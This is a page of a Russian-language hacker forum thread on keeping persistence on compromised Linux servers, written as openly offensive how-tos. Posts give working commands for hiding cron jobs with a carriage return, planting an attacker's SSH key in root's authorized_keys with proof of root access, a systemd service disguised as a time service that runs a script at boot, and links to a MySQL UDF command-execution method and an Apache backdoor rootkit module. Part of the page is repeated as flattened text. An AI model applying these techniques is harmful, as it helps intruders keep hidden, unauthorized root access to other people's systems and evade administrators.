Закрепление в системе - Страница 3

slashd · 19.01.2013, 22:10

Цитата:

Сообщение от b3

...

ЗЫ Вот еще интересный способ спрятаться в кронтабе: http://vladz.devzero.fr/004_hide-crontab.php
На случай если ресурс умрет, копипаста:

Here is an easy way to hide a task inside a crontab by using the carriage return character ('\r'), example (using cron version 3.0pl1-109):...

В качестве разделителя лучше использовать '||' вместо ';', т.к. crontab пытается выполнить команду '\rno', в результате чего возвращается ошибка исполнения и логи падают на почтовый ящик локалхоста пользователя. Потом это проявляется назойливыми предупреждениями в консоли о непрочитанных сообщениях.

b3 · 09.02.2013, 13:09

Закрепление в системе через ключи rsaauthentication ssh

Все знают данный метод, но тут он не описан...
Минус метода в том что он паливный когда пользователь на уязвимой системе не использует данный метод авторизации.
Зависимости:
В sshd_config

Код:

RSAAuthentication yes

Приступим:
1) Добавляем тестового пользователя, переключаемся на него:

Код:

# useradd -m xekir
# su - xekir

2) Генерируем ключи у этого пользователя:

Код:

[xekir@home ~]$ ssh-keygen -t rsa

3) Публичный ключь-строку вносим в список авторизованных ключей на уязвимом сервере:
а) сгенерированная ключь-строка лежит в

Код:

[xekir@home .ssh]$ cat /home/xekir/.ssh/id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRF+p8DbbE4SZpCknNkx7EYLgkNP6YmsiVfzy3RCUvDqDGrLQ3FI/GVMwsCzMOqB7JRyZiK7f8ZnHRZH78pvXA0SQxt7agac18cjop+B7S1MtjTMm/zWFhdHMMBu0q8EsMLJX4276IrIvqxMX4VsB5m4KE4p5wkMOOw2faVKSBC6DbY8EpbFh0yrWICochXTYGD+FH2hREAwL90Dhw+gsVPYPI0kg2NtlMj6cuI9TDpxiOwbhTMvy2l0jKNSo569zBxYapE4XbqdJsgrrTCGkFIpXiaSE2Bd4hjgO4wR17eEOIeQg4fG6zkXoKrXgGKZyE5o2Fny9LfL0QAic/kNIJ xekir@home

б) список авторизованных ключей на уязвимом сервере (с шела):

Код:

$ cat /etc/ssh/sshd_config | grep AuthorizedKeysFile 2>&1
AuthorizedKeysFile	%h/.ssh/authorized_keys

Вносим (с шела):

Код:

echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRF+p8DbbE4SZpCknNkx7EYLgkNP6YmsiVfzy3RCUvDqDGrLQ3FI/GVMwsCzMOqB7JRyZiK7f8ZnHRZH78pvXA0SQxt7agac18cjop+B7S1MtjTMm/zWFhdHMMBu0q8EsMLJX4276IrIvqxMX4VsB5m4KE4p5wkMOOw2faVKSBC6DbY8EpbFh0yrWICochXTYGD+FH2hREAwL90Dhw+gsVPYPI0kg2NtlMj6cuI9TDpxiOwbhTMvy2l0jKNSo569zBxYapE4XbqdJsgrrTCGkFIpXiaSE2Bd4hjgO4wR17eEOIeQg4fG6zkXoKrXgGKZyE5o2Fny9LfL0QAic/kNIJ xekir@home' >> /root/.ssh/authorized_keys

Проверяем:

Код:

[xekir@home .ssh]$ ssh root@192.168.0.100 "id;hostname"
uid=0(root) gid=0(root) группы=0(root)
debian-webserver386

Ссылка по теме:
http://www.opennet.ru/base/sec/ssh_pubkey_auth.txt.html

b3 · 14.05.2013, 00:28

Закрепление в системе через SYSTEMD
Данный метод хорош тем что systemd относительно недавно начали использовать и около-одмины могут не очень хорошо в нем "шурупить". На данный момент systemd по моему еще нет в debian но есть в centos серверах.

1) Создаем сервис-файл evil.service и наш сценарий /tmp/heck с нужным функционалом:

Код:

[Unit]
Description=Network Time Service (once)
After=network.target nss-lookup.target 

[Service]
Type=oneshot
ExecStart=/bin/sh /tmp/heck

[Install]
WantedBy=multi-user.target

/tmp/heck:

Код:

#!/bin/sh
id > /tmp/id.txt

2) Включаем его:

Код:

systemctl enable evil

3) Проверяем:

Код:

systemctl start evil
cat /tmp/id.txt

Цитата:

[23:18][root@home][/etc/systemd/system]# cat /tmp/id.txt
uid=0(root) gid=0(root) группы=0(root)

Теперь при включении сервера, после того как загрузиться network.target nss-lookup.target запуститься наш юнит который в свою очередь запустит наш сценарий однократно.

Инфа по systemd:
https://wiki.archlinux.org/index.php/systemd
http://www.freedesktop.org/wiki/Software/systemd

ewi · 29.06.2014, 18:41

Всё это хорошо, но если тема такая...
На серве включен "Safe mode: ON". Доступ к системе через ssi. Рут через эксплоит. Модуль Perl в апаче не загружен.
Вопрос вот в чем, как закрепиться в системе на случай, если админ запалит ssi и шелл останется изолированным в одном только php?

b3 · 05.07.2014, 16:52

ewi, Command execution with a MySQL UDF
http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html

smerch · 26.11.2014, 19:53

искал вариант закрепление на одном сервере, нагуглил такой mod apache: https://github.com/jingchunzhang/backdoor_rootkit/tree/master/mod_rootme-0.4

протестировал на debian(localhost) и centos, работает не плохо.
Единственное что, нужно апи апача подправлять в httpd*.h

09.02.2013, 13:09	#22
b3 Регистрация: 18.08.2010 Сообщений: 352 Репутация: 105	Закрепление в системе через ключи rsaauthentication ssh Все знают данный метод, но тут он не описан... Минус метода в том что он паливный когда пользователь на уязвимой системе не использует данный метод авторизации. Зависимости: В sshd_config Код: RSAAuthentication yes Приступим: 1) Добавляем тестового пользователя, переключаемся на него: Код: # useradd -m xekir # su - xekir 2) Генерируем ключи у этого пользователя: Код: [xekir@home ~]$ ssh-keygen -t rsa 3) Публичный ключь-строку вносим в список авторизованных ключей на уязвимом сервере: а) сгенерированная ключь-строка лежит в Код: [xekir@home .ssh]$ cat /home/xekir/.ssh/id_rsa.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRF+p8DbbE4SZpCknNkx7EYLgkNP6YmsiVfzy3RCUvDqDGrLQ3FI/GVMwsCzMOqB7JRyZiK7f8ZnHRZH78pvXA0SQxt7agac18cjop+B7S1MtjTMm/zWFhdHMMBu0q8EsMLJX4276IrIvqxMX4VsB5m4KE4p5wkMOOw2faVKSBC6DbY8EpbFh0yrWICochXTYGD+FH2hREAwL90Dhw+gsVPYPI0kg2NtlMj6cuI9TDpxiOwbhTMvy2l0jKNSo569zBxYapE4XbqdJsgrrTCGkFIpXiaSE2Bd4hjgO4wR17eEOIeQg4fG6zkXoKrXgGKZyE5o2Fny9LfL0QAic/kNIJ xekir@home б) список авторизованных ключей на уязвимом сервере (с шела): Код: $ cat /etc/ssh/sshd_config \| grep AuthorizedKeysFile 2>&1 AuthorizedKeysFile %h/.ssh/authorized_keys Вносим (с шела): Код: echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRF+p8DbbE4SZpCknNkx7EYLgkNP6YmsiVfzy3RCUvDqDGrLQ3FI/GVMwsCzMOqB7JRyZiK7f8ZnHRZH78pvXA0SQxt7agac18cjop+B7S1MtjTMm/zWFhdHMMBu0q8EsMLJX4276IrIvqxMX4VsB5m4KE4p5wkMOOw2faVKSBC6DbY8EpbFh0yrWICochXTYGD+FH2hREAwL90Dhw+gsVPYPI0kg2NtlMj6cuI9TDpxiOwbhTMvy2l0jKNSo569zBxYapE4XbqdJsgrrTCGkFIpXiaSE2Bd4hjgO4wR17eEOIeQg4fG6zkXoKrXgGKZyE5o2Fny9LfL0QAic/kNIJ xekir@home' >> /root/.ssh/authorized_keys Проверяем: Код: [xekir@home .ssh]$ ssh root@192.168.0.100 "id;hostname" uid=0(root) gid=0(root) группы=0(root) debian-webserver386 Ссылка по теме: http://www.opennet.ru/base/sec/ssh_pubkey_auth.txt.html

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

29.06.2014, 18:41	#24
ewi Регистрация: 02.04.2014 Сообщений: 75 Репутация: 2	Всё это хорошо, но если тема такая... На серве включен "Safe mode: ON". Доступ к системе через ssi. Рут через эксплоит. Модуль Perl в апаче не загружен. Вопрос вот в чем, как закрепиться в системе на случай, если админ запалит ssi и шелл останется изолированным в одном только php?

05.07.2014, 16:52	#25
b3 Регистрация: 18.08.2010 Сообщений: 352 Репутация: 105	ewi, Command execution with a MySQL UDF http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html

26.11.2014, 19:53	#26
smerch Регистрация: 20.01.2011 Сообщений: 21 Репутация: 6	искал вариант закрепление на одном сервере, нагуглил такой mod apache: https://github.com/jingchunzhang/backdoor_rootkit/tree/master/mod_rootme-0.4 протестировал на debian(localhost) и centos, работает не плохо. Единственное что, нужно апи апача подправлять в httpd*.h